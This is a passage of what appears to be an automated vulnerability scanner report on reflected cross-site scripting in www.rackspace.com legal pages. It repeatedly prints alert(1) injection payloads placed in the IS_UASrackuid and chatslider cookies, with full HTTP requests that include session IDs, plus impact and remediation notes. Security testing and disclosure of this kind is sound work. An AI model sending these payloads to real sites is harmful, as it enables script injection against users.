chatslider=Dfcd85"%3balert(1)//23c8788f011; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 602dd"><script>alert(1)</script>e6477830f9e was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/legal/clouddriveterms.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8602dd"><script>alert(1)</script>e6477830f9e; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d23d6"%3balert(1)//5eb6c2fbb00 was submitted in the IS_UASrackuid cookie. This input was echoed as d23d6";alert(1)//5eb6c2fbb00 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/legal/clouddriveterms.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8d23d6"%3balert(1)//5eb6c2fbb00; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4069d"><script>alert(1)</script>a0d2db8aee1 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/legal/clouddriveterms.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D4069d"><script>alert(1)</script>a0d2db8aee1; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ffa08"%3balert(1)//5b385cc3b8d was submitted in the chatslider cookie. This input was echoed as ffa08";alert(1)//5b385cc3b8d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/legal/clouddriveterms.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Dffa08"%3balert(1)//5b385cc3b8d; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 643ff"><script>alert(1)</script>f7eed7ab8b4 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/legal/generalterms.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8643ff"><script>alert(1)</script>f7eed7ab8b4; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7352f"%3balert(1)//3b93e013233 was submitted in the IS_UASrackuid cookie. This input was echoed as 7352f";alert(1)//3b93e013233 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/legal/generalterms.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f87352f"%3balert(1)//3b93e013233; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f506c"><script>alert(1)</script>2fc96242434 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/legal/generalterms.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Df506c"><script>alert(1)</script>2fc96242434; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc6e1"%3balert(1)//24bc06608e was submitted in the chatslider cookie. This input was echoed as dc6e1";alert(1)//24bc06608e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/legal/generalterms.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Ddc6e1"%3balert(1)//24bc06608e; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0abc"><script>alert(1)</script>f67bbec0e3b was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/legal/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8f0abc"><script>alert(1)</script>f67bbec0e3b; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9d19"%3balert(1)//4fb3db8a28a was submitted in the IS_UASrackuid cookie. This input was echoed as d9d19";alert(1)//4fb3db8a28a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/legal/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8d9d19"%3balert(1)//4fb3db8a28a; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 279c9"><script>alert(1)</script>3be2fd9b4de was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/legal/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D279c9"><script>alert(1)</script>3be2fd9b4de; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c06d6"%3balert(1)//ac5fd9481f3 was submitted in the chatslider cookie. This input was echoed as c06d6";alert(1)//ac5fd9481f3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/legal/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Dc06d6"%3balert(1)//ac5fd9481f3; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2c38"><script>alert(1)</script>c2bacbbad52 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/legal/mailterms.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8b2c38"><script>alert(1)</script>c2bacbbad52; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41dad"%3balert(1)//6893b9b887b was submitted in the IS_UASrackuid cookie. This input was echoed as 41dad";alert(1)//6893b9b887b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
